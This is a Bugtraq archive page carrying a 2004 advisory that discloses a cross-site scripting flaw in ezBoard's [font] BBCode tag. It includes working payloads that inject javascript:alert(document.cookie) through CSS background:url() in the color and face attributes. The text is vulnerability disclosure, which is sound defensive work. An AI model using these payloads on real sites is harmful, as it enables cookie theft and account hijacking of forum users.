Bugtraq mailing list archives
ezBoard Cross Site Scripting Vulnerability
From: Cheng Peng Su <apple_soup () msn com>
Date: 23 Feb 2004 14:09:44 -0000
######################################################## Advisory Name:ezBoard Cross Site Scripting Vulnerability Release Date: Feb 24,2004 Application: ezBoard Version Affected: 7.3u or lower? Vendor URL: http://www.ezboard.com/ Discover: Cheng Peng Su(apple_soup_at_msn.com) ######################################################## Proof of Concept: This vuln is from [font],ezBoard doesn't filter illegal characters ,such as ';() [font color=red;background:url(javascript:{XSS code})]hey[/font] will show <span style="color:red;background:url(javascript:{XSS code});font-size:small;">hey</span> and [font face=Verdana;background:url(javascript:{XSS code})]hey[/font] will show <span style="font-family:Verdana;background:url(javascript:{XSS code}));font-size:small;">hey</span> Exploit: [font color=red;background:url(javascript:alert(document.cookie))]Big Exploit![/font] [font face=Verdana;background:url(javascript:alert(document.cookie))]Big Exploit![/font] Contact: Cheng Peng Su apple_soup_at_msn.com Class 1,Senior 2,High school attached to Wuhan University Wuhan,Hubei,China
Current thread:
- ezBoard Cross Site Scripting Vulnerability Cheng Peng Su (Feb 23)